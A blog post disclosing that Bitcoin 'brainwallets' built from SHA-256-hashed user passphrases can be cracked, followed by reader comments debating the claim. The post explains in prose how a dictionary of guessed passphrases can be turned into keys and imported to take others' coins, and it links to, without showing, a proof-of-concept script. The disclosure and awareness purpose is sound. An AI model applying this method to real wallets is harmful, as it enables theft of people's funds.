Bitcoin “Brainwallets” and why they are a bad idea

// Decided to publish this after some misgivings about disclosure. After telling Asher about it earlier, it was decided to disclose it to make people aware of the issue.

A week or two ago, I stumbled across an article about how these “Brainwallet” things were making your bitcoins “Deniable”, as no “wallet” exists except in your head.

How they work is quite simple: you take a passphrase, and that is to be the super secret key for your “wallet”. So long as you remember that passphrase, you can access the wallet.

This passphrase is hashed with SHA256 to form the private key for your wallet, so you can generate your privkey at will. The privkey is turned into a bitcoin address using the standard algorithm.

Now, so long as you know the private key, you own that wallet. So if you know the passphrase, you know the private key. This is essentially basing the private key on insecure (user supplied as opposed to random) data, normally a word or string of words (everyone sucks at passphrases).

Now, how do we go about attacking this. Well, think of it as the same as cracking peoples passwords.

You take a dictionary of likely looking passphrases, and hash ‘em with SHA-256 to make a bunch of private keys. You then convert them to wallet-import format using the Base58 encoding that Bitcoin uses, and pass the WIF string to bitcoind to import the wallet. If anyone was using that private key/passphrase, all their bitcoin now belongs to you.

Being a lovely person, I wrote up a proof of concept based on brainwallet.py (a brainwallet generator) that automatically does all this. My code is terrible, but it proves the point I was trying to make. A better written piece of code could import thousands of keys incredibly quickly, exhausting entire blocks of passphrase-keyspace.

Proof of Concept

The brainwallet.py implementation I hacked into the above can be gotten here: Brainwallet.py

The terrifying thing about this is, you are not only stealing “current” bitcoins, but also future ones. If anyone ever uses any of the passphrases you have “pwned”, you own their bitcoins.

So, tell your friends: Brainwallets are dumb.

-infodox

p.s.: we now accept bitcoin if you ever feel like buying us a beer. 1MJ6KnLdXm82UjdDuvgjxDhngLjBMJfamV

NOTE: We do not encourage or approve of stealing peoples money. It is a bad idea.

13 thoughts on “Bitcoin “Brainwallets” and why they are a bad idea

  1. It was just a matter of time until someone would find a simple way to break into; add the power of GPUs, and even bitcoins strong encryption will be broke…

  2. Pingback: Erh̦htes Hacker-Risiko bei Bitcoin Brainwallets | Edv-Sicherheitskonzepte.de РNews Blog aus vielen Bereichen

  3. I’m not sure exactly what brainwallets you’re talking about, but for example, Electrum generates a random 128-bit key and turns it into a mnemonic sequence of words in base 1626. The passphrase isn’t manually chosen.

  4. Thanks for your findings – however there is a big chance for people mistaking this as FUD (fear, uncertainty and doubt) towards brain wallets.
    Saying brainwallets are a bad idea is the same as saying passwords are a bad idea. Weak passwords are a bad idea – just as weak brain wallets are a bad idea. It is also true that humans pick bad passwords and brain wallets beacause they tend to be good at memorizing phrases which are easily determined by a computer. However random passwords and braind wallets can be fairly strong with many years of computing power needed to brute force them.

    Deterministic wallet seeds in the Bitcoin client Electrum for example have 128 bits of entropy. 12 words are taken from a list of contemporary English poetry with 1626 entries. This is roughly the same key space as using a 21 character base 64 password containing random computer generated letters, numbers and two special characters. This is pretty strong.

    I would advise to make note of this in your article as press reports i.e. http://www.heise.de/security/meldung/Erhoehtes-Hacker-Risiko-bei-Bitcoin-Brainwallets-1831843.html have used your blog post to state that brain wallets are generally a bad idea, which is not the case.

    • It is the human side of things I was pointing towards, in that people as a rule pick terrible passwords. Given the fact many normal users seeing this as convenient will likely choose a simple password, their coins are therefore at some risk.

      I will be investigating the implementation in Electrum, I actually was looking for a bitcoin client :)

  5. Please take this page down.

    Saying brainwallets are insecure because people choose bad passphrases is like saying all passwords are bad because people choose bad passwords.

    Bitcoin brainwallet clients such as electrum pick the seed words for you so you won’t be able to choose insecure words.

    Deterministic wallets are much more secure for the average user where the primary security risk or loss is their own incompetence. Many users do not know of the bitcoin keypool and run the risk of losing all their coins after 100 transactions if they do not regularly backup their files.

    The primary risk for single private key brainwallets is COMPLETELY different than what you posted about. The risk is that the user doesn’t understand that most bitcoin clients (e.g. bitcoin-qt) will send change to a NEW ADDRESS; so if you used a single-private-key brainwallet and deleted the wallet file, the coins are lost because they are in a new address.

    The solution to that problem would be to use a brainwallet that is comprised of deterministic private keys from a seed (such as electrum or armory).

  6. I don’t really understand what the problem is. The number of possible ways to combine even a short sequence of English words is practically infinite. Take this paragraph as an example. How could it be cracked by brute force?

    • It could be cracked by sha256-ing the entire internet. Seriously, people pick bad passphrases like their favorite line from their favorite classic book. But brain wallets are not bad, you just have to take precautions. First, “salt” the passphrase by putting your full name first. This adds a lot of easy-to-remember entropy. Essentially, by doing this an an attacker cannot attempt to crack everybody’s passphrase at once — it must go after you specifically. Next, don’t pick any phrase that you’ve ever read anywhere, and make it pretty long if it has language redundancies (i.e. is an intelligible sentance). Or pick random words as these wallets do for you.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>